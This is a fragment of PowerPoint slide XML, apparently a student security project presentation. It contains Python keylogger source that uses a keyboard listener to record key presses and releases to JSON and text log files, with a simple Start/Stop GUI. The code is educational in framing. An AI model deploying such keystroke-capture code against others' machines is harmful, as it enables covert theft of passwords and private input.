            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(
            {'Held': f'{key}'}
        )
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)
def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(key):
    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, keys
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(
        {'Released': f'{key}'}
    )
    if flag == True:
        flag = False
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)
    keys = keys + str(key)
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(str(keys))
def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>():
    global listener
    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(state='disabled')
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(state='normal')
def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>():
    global listener
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(text="Keylogger stopped.")
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(state='normal')
    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(state='disabled')
root = Tk()
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("Keylogger")
label = Label(root, text='Click "Start" to begin keylogging.')
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(anchor=CENTER)
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(side=LEFT)
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, state='disabled')
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(side=RIGHT)
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("250x250")
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048676" name="TextBox 1048675"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896039" y="746042"/>
            <a:ext cx="7302863" cy="751839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result :</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="28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4"/>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1048607" name="Content Placeholder 1"/>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Content Placeholder 2"/>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1048609" name="Title 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535670" y="844659"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit fontScale="86364"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B5A43BD-DACD-4EC2-9B3E-25862235223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162bd5b-4ed9-4da3-b376-05204580ba3f"/>
    <ds:schemaRef ds:uri="c0fa2617-96bd-425d-8578-e93563fe37c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TotalTime>
  <Words>1321</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>63</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 AND SECURITY</vt:lpstr>
      <vt:lpstr>OUTLINE</vt:lpstr>
      <vt:lpstr>Problem Statement</vt:lpstr>
      <vt:lpstr>Proposed Solution</vt:lpstr>
      <vt:lpstr>System  Approach</vt:lpstr>
      <vt:lpstr>Algorithm &amp; Deployment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kings engineering college</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T05:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-09T09:26:58Z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f334451a9d304d05be4760740c5d5331</vt:lpwstr>
  </property>
</Properties>
</file>